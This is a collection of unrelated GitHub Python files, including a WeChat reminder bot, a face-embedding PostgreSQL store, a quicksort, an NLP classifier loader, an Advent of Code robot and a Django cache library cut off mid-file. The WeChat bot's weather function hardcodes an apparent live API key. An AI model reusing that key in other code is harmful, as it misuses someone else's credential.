toUserName=alpha_meow)\n\n\n# 订餐提醒定时器\ndef job_ordering():\n ordering_url = 'http://hy.dmeiwei.com/wx/wxgetcodeurl_dczx.asp'\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:小嘉琳记得公司订餐呐\\n' \\\n '链接是:\\n' + ordering_url + '\\n请现在立刻马上行动起来!'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 午睡提醒器\ndef job_siesta():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:已经到午休时间啦,你们快点去睡觉觉/睡'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 种树\ndef job_plant_trees():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:快去支付宝收能量啦,不然要被偷走了'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 喂鸡提醒器\ndef job_feeding_chickens():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:要去看看鸡仔饿了没有哦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 下班\ndef job_off_duty():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点下班回家撸猫啦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 休息\ndef job_rest():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:别太忙了,要起来走走动动,喝杯水,休息一下。'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 新建提醒\ndef 
new_jobs(sched, text, act_name):\n arr = text.split('/')\n date_format = arr[1]\n date = arr[2]\n obj = arr[4]\n todo = arr[-1]\n\n itchat.send_msg('阿尔法猫已经收到信息了,新建了一个任务\\n时间是:' + date + \"\\n任务内容是:\" + todo, toUserName=alpha_meow)\n\n if date_format == 'longtime':\n t_struct = time.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n sched.add_job(func=job_notice, trigger='date',\n run_date=datetime(t_struct.tm_year, t_struct.tm_mon, t_struct.tm_mday,\n t_struct.tm_hour, t_struct.tm_min, t_struct.tm_sec),\n args=[obj, act_name, todo])\n\n\ndef job_notice(obj='我', act_name=None, todo=None):\n if obj == '我':\n obj = act_name\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:' + todo + '\\n @' + obj + ' '\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\ndef weather(msg):\n arr = msg.split('/')\n if len(arr) > 1:\n location = arr[1]\n if location == '今天':\n location = '广州'\n\n args = {'location': location, 'key': '12d04dfd2f514c158f6b69291225576e'}\n res = requests.get(\"https://free-api.heweather.net/s6/weather/now\", params=args)\n if res.status_code == 200:\n result = res.json()\n # 体感温度,默认单位:摄氏度\n fl = result['HeWeather6'][0].get('now')['fl']\n # 温度,默认单位:摄氏度\n tmp = result['HeWeather6'][0].get('now')['tmp']\n # 实况天气状况描述\n cond_txt = result['HeWeather6'][0].get('now')['cond_txt']\n\n if int(fl) <= 20:\n remind = '记得多穿点衣服哦'\n elif int(fl) >= 28:\n remind = '记得多补水,注意防晒'\n else:\n remind = '要开开心心的呢'\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n' + location + '天气:' + cond_txt + \",气温:\" + tmp + \"°C,体感温度:\" + fl + '°C' \\\n + '\\n阿尔法猫提醒你:' + remind\n itchat.send_msg(notice, toUserName=alpha_meow)\n else:\n notice = '天气预报异常啦,Biubiu快去看看'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 创建两个线程\ntry:\n _thread.start_new_thread(meow, (\"Thread-1\", 2,))\n _thread.start_new_thread(jobs, (\"Thread-2\", 4,))\nexcept:\n print(\"Error: unable to start thread\")\n\nwhile 1:\n pass\n\n# 文件传输助手\n# itchat.send('hello world', toUserName='filehelper')\n", "repo_name": "biuhe/wechat-robot", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.strftime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "itchat.auto_login", "line_number": 16, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 19, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 20, "usage_type": "call"}, {"api_name": "itchat.search_chatrooms", "line_number": 21, "usage_type": "call"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 23, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 31, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 37, "usage_type": "call"}, {"api_name": "itchat.run", "line_number": 51, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 80, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 86, "usage_type": "call"}, 
{"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 89, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 96, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 103, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 110, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 117, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 124, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 135, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 151, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 162, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 182, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 185, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 190, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "70758828329", "text": "from facekeeper.core import StorageInterface, PersonEmbedding\nimport numpy as np\nimport psycopg2\nfrom typing import List, Optional\nfrom psycopg2.extensions import register_adapter, AsIs\nfrom psycopg2.extras import RealDictCursor\n\n\ndef addapt_numpy_array(numpy_array):\n return AsIs(list(numpy_array))\n\n\nclass PostgreSQLStorage(StorageInterface):\n def __init__(self, dsn: str):\n super().__init__()\n register_adapter(np.ndarray, addapt_numpy_array)\n self.dsn = dsn\n self.conn = None\n\n def save_embedding(self, person: str, digest: str, 
recognizer: str, embedding: np.array, tags: List[str],) -> str:\n try:\n cur = self.get_connection().cursor()\n sql = \"INSERT INTO embeddings (person, digest, recognizer, embedding, tags) VALUES (%s, %s, %s, ARRAY%s, %s) RETURNING id\"\n cur.execute(sql, (person, digest, recognizer, embedding, tags))\n row = cur.fetchone()\n self.get_connection().commit()\n return row['id']\n except psycopg2.errors.UniqueViolation:\n self.get_connection().rollback()\n # We anyway will return the ID of already saved embedding\n return self.get_embedding_id(recognizer, digest)\n finally:\n cur.close()\n\n def get_embeddings(self, recognizer) -> List[PersonEmbedding]:\n cur = self.get_connection().cursor()\n sql = \"SELECT id, person, embedding, tags FROM embeddings WHERE recognizer = %s\"\n cur.execute(sql, (recognizer,))\n\n return [PersonEmbedding(r['id'], r['person'], np.array(r['embedding']), r['tags']) for r in cur.fetchall()]\n\n def get_embedding(self, embedding_id: str) -> dict:\n cur = self.get_connection().cursor()\n sql = \"SELECT * FROM embeddings WHERE id = %s\"\n cur.execute(sql, (embedding_id,))\n return cur.fetchone()\n\n def get_embedding_id(self, recognizer, digest) -> Optional[str]:\n cur = self.get_connection().cursor()\n cur.execute(\n \"SELECT id FROM embeddings WHERE recognizer = %s AND digest = %s\", (recognizer, digest),\n )\n row = cur.fetchone()\n return str(row['id']) if row else None\n\n def get_connection(self) -> psycopg2.extensions.connection:\n if self.conn is None:\n self.conn = self.connect()\n\n return self.conn\n\n def connect(self) -> psycopg2.extensions.connection:\n return psycopg2.connect(self.dsn, cursor_factory=RealDictCursor)\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/storage/postgresql.py", "file_name": "postgresql.py", "file_ext": "py", "file_size_in_byte": 2479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.extensions.AsIs", "line_number": 10, "usage_type": "call"}, {"api_name": "facekeeper.core.StorageInterface", "line_number": 13, "usage_type": "name"}, {"api_name": "psycopg2.extensions.register_adapter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "psycopg2.errors", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 56, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 63, "usage_type": "call"}, {"api_name": "psycopg2.extras.RealDictCursor", "line_number": 63, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "21453959135", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n def sortArray(self, nums: List[int]) -> List[int]:\n low = 0\n high = len(nums)-1\n self._quick_sort(low, high, nums)\n return nums\n \n def _quick_sort(self, low: int, high: int, nums: List[int]) -> 
None:\n # 递归返回条件\n if low >= high:\n return\n mid = self._partition(low, high, nums)\n self._quick_sort(low, mid-1, nums)\n self._quick_sort(mid+1, high, nums)\n\n def _partition(self, low: int, high: int, nums: List[int]) -> int:\n # 选取pivot_idx\n pivot_idx = random.randint(low, high)\n # 将pivot换到首位(因为pivot已知 相当于把首位空下来)\n nums[low], nums[pivot_idx] = nums[pivot_idx], nums[low]\n pivot = nums[low]\n l, r = low, high\n while l < r:\n # r由右往左移动 找到一个小于pivot的数 将其挪到'空出来'的位置(此时的 l)\n # 完成'挪动'后此时 r 相当于也空了下来\n while l < r and nums[r] >= pivot:\n r -= 1\n nums[l] = nums[r]\n # l由左往右移动 找到一个大于pivot的数 将其挪到'空出来'的位置(此时的 r)\n # 完成'挪动'后此时 l 相当于也空了下来\n while l < r and nums[l] <= pivot:\n l += 1\n nums[r] = nums[l]\n nums[l] = pivot\n return l", "repo_name": "jerrt2003/leetcode-in-python", "sub_path": "912_Sort_an_Array/quick_sort.py", "file_name": "quick_sort.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "5093241901", "text": "# ------------------ Importing necessary libraries -----------\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.stem import WordNetLemmatizer \nimport nltk\nimport pickle\nimport re\n\nnltk.download('stopwords') #stopwords\nnltk.download('wordnet') #database of English language\nnltk.download('punkt') #tokenization\nnltk.download('vader_lexicon') \n \n\n# --------- Text cleaning ---------\ndef preprocess(text):\n text = str(text)\n #strip \n text = re.sub(r'.+?', '', text) \n text = re.sub(r'.+?', '', text)\n text = re.sub(r'<.+?>', '', text) # remove all other html tags\n text = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', text)\n \n ## remove punctuations, non-alphanumeric characters and underscores\n text = re.sub(r'[^\\w\\s]|\\d|_', ' ', text)\n \n text = str(text).lower().strip()\n \n #tokenize\n tokenizer = PunktSentenceTokenizer()\n tokens = tokenizer.tokenize(text)\n \n #remove stopwords\n stop_words = stopwords.words('english')\n tokens = [t for t in tokens if t not in stop_words]\n \n #lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(t) for t in tokens]\n text = \" \".join(tokens)\n text = str(text).lower().strip()\n text = [text]\n \n return text\n\n# ------- TFIDF + AdaBoost -----------\n\ndef model(text):\n # Preprocess text\n text = preprocess(text)\n \n # Load TFIDF\n tfidf = pickle.load(open(\"tfidftest.pkl\", \"rb\" ) )\n text_vectorized = tfidf.transform(text)\n \n # Apply Trained Model \n \n model = pickle.load(open('Ada10est81acc.sav', 'rb'))\n \n result = model.predict(text_vectorized)\n \n return result\n\n\n\n\n", "repo_name": "marinamer/Political-Bias-NLP", "sub_path": "Flask/ml_model.py", "file_name": "ml_model.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 12, "usage_type": "call"}, {"api_name": "re.sub", 
"line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.tokenize.PunktSentenceTokenizer", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 34, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "252855898", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsolution for day 11 of 2019\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport sys; sys.path.append('..')\nfrom intcode import Intcode\nfrom collections import deque\nfrom matplotlib import pyplot as plt\n\n\nwith open('input.txt', 'r') as f:\n data = f.read()\n\n\nclass Robot(Intcode):\n\n def __init__(self, data, once=False, emerg_hull=False):\n self.coord = [[[0, 0], 0]]\n self.directions = deque(['up', 'right', 'down', 'left'])\n self.direction = None\n self.color = None\n self.painted = 1\n self.emerg_hull = emerg_hull\n self.inpt = None\n super().__init__(data, once)\n\n\n def getInput(self):\n \"\"\"returns the value that goes in input to op3\"\"\"\n if self.emerg_hull:\n self.emerg_hull = False\n return 1\n value = self.getCurrentColor()\n return value\n\n\n def getCurrentColor(self):\n \"\"\"returns the color of the tile the robot is standing on\"\"\"\n current = self.coord[-1]\n self.sensor_color = current[1]\n return self.sensor_color\n\n\n def manipulate(self):\n \"\"\"allows for the parsing of the 2 intcode outputs: color and rotation\"\"\"\n if len(self.outputs) % 2 == 0 and self.outputs != []:\n self.color = self.outputs[-2]\n if self.outputs[-1]:\n self.directions.rotate(-1)\n self.direction = self.directions[0]\n else:\n self.directions.rotate(1)\n self.direction = self.directions[0]\n self.move()\n\n\n def findTile(self, x, y):\n \"\"\"returns the tile if it's tracked, else None\"\"\"\n target = [x, y]\n for elem in self.coord[::-1]:\n if elem[0] == target:\n return elem\n\n\n def move(self):\n current = self.coord[-1]\n current[1] = self.color\n\n x, y = current[0] # get current coordinates\n\n if self.direction == 'up':\n y += 1\n elif self.direction == 'right':\n x += 1\n elif self.direction == 'down':\n y -= 1\n else:\n x -= 1\n\n target_tile = self.findTile(x, y)\n if target_tile:\n color = target_tile[1]\n else:\n color = 0\n self.painted += 1\n self.coord.append([[x, y], color])\n\nrobot = Robot(data)\nprint(robot.painted)\n\n\n# create a new object for part 2\nreg_ident = Robot(data, 1, emerg_hull=True)\ncode = [x[0] for x in reg_ident.coord if x[1] == 1]\n\nx_em = [x[0] for x in code]\ny_em = [y[1] for y in code]\n\nplt.scatter(x_em, y_em)\nplt.xlim(-3, 43)\nplt.ylim(-20, 20)\nplt.show()\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2019/11/day11.py", "file_name": "day11.py", "file_ext": "py", "file_size_in_byte": 2671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": 
"attribute"}, {"api_name": "intcode.Intcode", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}]} +{"seq_id": "27212894053", "text": "import six\nimport time\nimport copy\n\nfrom distutils.version import StrictVersion\nfrom abc import ABCMeta, abstractmethod, abstractproperty\nfrom collections import defaultdict\nfrom functools import partial\n\nimport django\n\ntry:\n from django.core.cache import get_cache\nexcept ImportError:\n from django.core.cache import caches\n def get_cache(backend):\n return caches[backend]\n\nfrom django.http import Http404\nfrom django.db import models, transaction\n\ntry:\n from django.db.models import get_models\nexcept ImportError:\n from django.apps import apps\n get_models = apps.get_models\n\ntry:\n from django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor\nexcept ImportError:\n from django.db.models.fields.related_descriptors import \\\n ForwardManyToOneDescriptor as ReverseSingleRelatedObjectDescriptor\n\nGenericForeignKeyObject = None\ndef importGenericForeignKey():\n global GenericForeignKeyObject\n if GenericForeignKeyObject is not None:\n return GenericForeignKeyObject\n try:\n from django.contrib.contenttypes.generic import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n except ImportError:\n from django.contrib.contenttypes.fields import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n return GenericForeignKey\n\n\nfrom flash import settings as flash_settings\nfrom flash.option import Some\nfrom flash.utils import memcache_key_escape, flash_properties\n\n\ncache = get_cache(flash_settings.CACHE_NAME)\n\n\ndef is_abstract_class(cls):\n \"\"\" Returns boolean telling whether given class is abstract or not.\n\n A class is abstract if it has not implemented any abstractmethod or\n abstractproperty of base classes.\n \"\"\"\n return bool(getattr(cls, \"__abstractmethods__\", False))\n\n\ndef instancemethod(method):\n \"\"\" Decorator for creating descriptor class to call method with\n instance when called with class.\n \"\"\"\n class MethodDisc(object):\n def __get__(self, ins, cls):\n if ins is None:\n # when method is called from class\n # get instance of that class and use that\n try:\n ins = cls()\n except NameError:\n return method\n return partial(method, ins)\n return MethodDisc()\n\n\nclass DontCache(object):\n def __init__(self, val):\n self.inner_val = val\n\n\n@six.python_2_unicode_compatible\nclass StaleData(object):\n def __init__(self, timestamp):\n self.timestamp = timestamp\n\n def __str__(self):\n return \"StaleData(timestamp=%s)\" % self.timestamp\n\n\ndef cache_get_many(keys):\n if not keys:\n return {}, {}\n\n d = cache.get_many(keys)\n result_dict = {}\n stale_data_dict = {}\n\n for key, value in d.items():\n if isinstance(value, StaleData):\n stale_data_dict[key] = value\n else:\n 
result_dict[key] = value\n\n return result_dict, stale_data_dict\n\n\nclass InvalidationType(object):\n OFF = 0\n UNSET = 1\n RESET = 2\n DYNAMIC = 3\n\nUSING_KWARG = '__using'\n\nclass WrappedValue(object):\n def __init__(self, value, version, timestamp):\n self.value = value\n self.version = version\n self.timestamp = timestamp\n\n\nclass Cache(six.with_metaclass(ABCMeta, object)):\n \"\"\" The very base class for all cache classes.\n\n Methods decorated with abstractmethod or abstractproperty\n have to be implemented by derived classes.\n\n It's necessary to put ABCMeta or its derived class to put\n as metaclass to achieve above constraints.\n \"\"\"\n # Derived class may provide serializer (E.g. for compression)\n serializer = None\n\n # default version\n version = 0\n\n # default timeout\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n # default invalidation\n invalidation = InvalidationType.UNSET\n\n # default allowtime\n allowtime = None\n\n cache_type = 'SimpleCache'\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n @property\n def key(self):\n return self.get_key(*self.args, **self.kwargs)\n\n @abstractmethod\n def get_key(self, *args, **kwargs):\n \"\"\" Returns the key for given params (args and kwargs).\n \"\"\"\n pass\n\n @instancemethod\n def get_dynamic_version(self):\n from flash.models import CacheDynamicVersion\n return CacheDynamicVersion.objects.get_version_of(type(self))\n\n @staticmethod\n def get_stale_key(key):\n return key + '__stale'\n\n def to_cache_value(self, value):\n if self.serializer:\n value = self.serializer.dumps(value)\n return value\n\n def from_cache_value(self, value):\n if self.serializer:\n value = self.serializer.loads(value)\n return value\n\n @staticmethod\n def get_write_lock_key(key):\n return key + '__write_lock'\n\n def try_acquire_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.add(write_lock_key, True,\n timeout=flash_settings.WRITE_LOCK_TIMEOUT)\n\n def release_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.delete(write_lock_key)\n\n def get_option_value_from_cache_coroutine(self, key, extra_keys=None,\n key_value_dict=None):\n \"\"\" key: str,\n extra_keys: list\n key_value_dict: dict,\n\n Yields value assosiated with key in cache, wrapped as Option value.\n\n If extra_keys is passed then all values are fetched assosiated with\n keys in extra_keys and put to key_value_dict.\n \"\"\"\n keys = []\n keys.append(key)\n if extra_keys is not None:\n keys.extend(extra_keys)\n\n # result_dict is dict of key value pair\n result_dict = yield keys\n\n if not result_dict:\n yield None\n return\n\n if extra_keys and (key_value_dict is not None):\n keys_found = set(result_dict.keys()) & set(extra_keys)\n for key_found in keys_found:\n key_value_dict[key_found] = result_dict[key_found]\n\n if key not in result_dict:\n yield None\n return\n\n value = result_dict[key]\n if isinstance(value, WrappedValue):\n value.value = self.from_cache_value(value.value)\n else:\n value = self.from_cache_value(value)\n yield Some(value)\n\n @abstractmethod\n def get_value_for_params(self, *args, **kwargs):\n \"\"\" The fallback method to return value for given params.\n Mostly implemented to get value from database.\n \"\"\"\n pass\n\n def get_extra_keys(self, *args, **kwargs):\n pass\n\n def get_extra_key_value_dict(self, value, *args, **kwargs):\n pass\n\n def pre_set_process_value(self, value, *args, **kwargs):\n return value\n\n def 
post_process_value(self, value, *args, **kwargs):\n return value\n\n def _set(self, key, value, key_value_dict=None, stale_data_dict=None,\n force_update=False):\n \"\"\" Sets the given key value in cache.\n\n If key_value_dict is passed sets all key-values\n in this dict to cache too.\n \"\"\"\n if stale_data_dict is None:\n stale_data_dict = {}\n\n value = self.to_cache_value(value)\n value = WrappedValue(value, self.get_dynamic_version(), time.time())\n\n if key_value_dict is None:\n key_value_dict = {}\n key_value_dict[key] = value\n\n for key_, value_ in key_value_dict.items():\n if key_ in stale_data_dict:\n current_value_dict = cache.get_many([key_])\n if key_ in current_value_dict:\n current_value = current_value_dict[key_]\n stale_value = stale_data_dict[key_]\n if (isinstance(current_value, StaleData) and\n current_value.timestamp == stale_value.timestamp):\n cache.set(key_, value_, timeout=self.timeout)\n continue\n if force_update:\n cache.set(key_, value_, timeout=self.timeout)\n else:\n cache.add(key_, value_, timeout=self.timeout)\n\n def get_coroutine(self, *args, **kwargs):\n \"\"\" Yields the value for given params (args and kwargs).\n\n First tries to get it from cache. If not found, gets it from\n fallback method and sets the value to cache.\n \"\"\"\n key = self.get_key(*args, **kwargs)\n\n is_invalidation_dynamic = (\n self.invalidation == InvalidationType.DYNAMIC)\n extra_keys = self.get_extra_keys(*args, **kwargs) or []\n if is_invalidation_dynamic:\n stale_key = self.get_stale_key(key)\n extra_keys.append(stale_key)\n key_value_dict = {}\n\n coroutine = self.get_option_value_from_cache_coroutine(key, extra_keys,\n key_value_dict)\n keys = coroutine.send(None)\n result_dict, stale_data_dict = yield keys\n option_value = coroutine.send(result_dict)\n\n return_cache_value = False\n lock_acquired = False\n force_update = False\n if option_value is not None:\n # cache found in cache\n w_value = option_value.unwrap()\n current_dynamic_version = self.get_dynamic_version()\n if isinstance(w_value, WrappedValue):\n try_acquire_lock = False\n value = w_value.value\n if self.allowtime and (\n (time.time() - w_value.timestamp) < self.allowtime):\n return_cache_value = True\n elif (current_dynamic_version is not None and\n current_dynamic_version != w_value.version):\n if self.invalidation in [\n InvalidationType.OFF,\n InvalidationType.DYNAMIC]:\n try_acquire_lock = True\n else:\n force_update = True\n elif is_invalidation_dynamic:\n is_stale = stale_key in stale_data_dict\n if not is_stale:\n return_cache_value = True\n else:\n try_acquire_lock = True\n elif self.allowtime and (\n self.invalidation == InvalidationType.OFF):\n try_acquire_lock = True\n elif self.allowtime is None:\n return_cache_value = True\n else:\n force_update = True\n if try_acquire_lock:\n lock_acquired = self.try_acquire_write_lock(key)\n if not lock_acquired:\n return_cache_value = True\n else:\n force_update = True\n else:\n value = w_value\n return_cache_value = True\n\n if not return_cache_value:\n # get value using fallback method (e.g. 
db)\n value = self.get_value_for_params(*args, **kwargs)\n if not isinstance(value, DontCache):\n key_value_dict = self.get_extra_key_value_dict(\n value, *args, **kwargs)\n\n set_value_in_cache = True\n if (option_value is None and key in stale_data_dict and\n (time.time() - stale_data_dict[key].timestamp) < 0.3):\n # cache was just invalidated\n # db may return stale data\n # hence\n set_value_in_cache = False\n\n if StrictVersion(django.get_version()) < StrictVersion('1.7'):\n transaction.commit_unless_managed()\n\n value = self.pre_set_process_value(value, *args, **kwargs)\n\n # set the key value in cache\n if set_value_in_cache:\n self._set(key, value, key_value_dict, stale_data_dict,\n force_update=force_update)\n\n if is_invalidation_dynamic:\n cache.delete(stale_key)\n\n if lock_acquired:\n self.release_write_lock(key)\n\n if isinstance(value, DontCache):\n value = value.inner_val\n\n value = self.post_process_value(\n value, key_value_dict, *args, **kwargs)\n yield value\n\n def resolve_coroutine(self):\n return self.get_coroutine(*self.args, **self.kwargs)\n\n def get(self, *args, **kwargs):\n \"\"\" Returns the yielded vale from get_coroutine method\n \"\"\"\n coroutine = self.get_coroutine(*args, **kwargs)\n keys = coroutine.send(None)\n if flash_settings.DONT_USE_CACHE:\n result_dict, stale_data_dict = {}, {}\n else:\n result_dict, stale_data_dict = cache_get_many(keys)\n value = coroutine.send((result_dict, stale_data_dict))\n return value\n\n def resolve(self):\n return self.get(*self.args, **self.kwargs)\n\n def reset(self, *args, **kwargs):\n \"\"\" Resets the value in cache using fallback method for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(*args, **kwargs)\n value = self.get_value_for_params(*args, **kwargs)\n key_value_dict = self.get_extra_key_value_dict(value, *args, **kwargs)\n value = self.pre_set_process_value(value, *args, **kwargs)\n self._set(key, value, key_value_dict)\n\n def set(self, params, value, pre_set_process=True):\n \"\"\" Sets the given value in cache for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(**params)\n if pre_set_process:\n value = self.pre_set_process_value(value, **params)\n self._set(key, value, 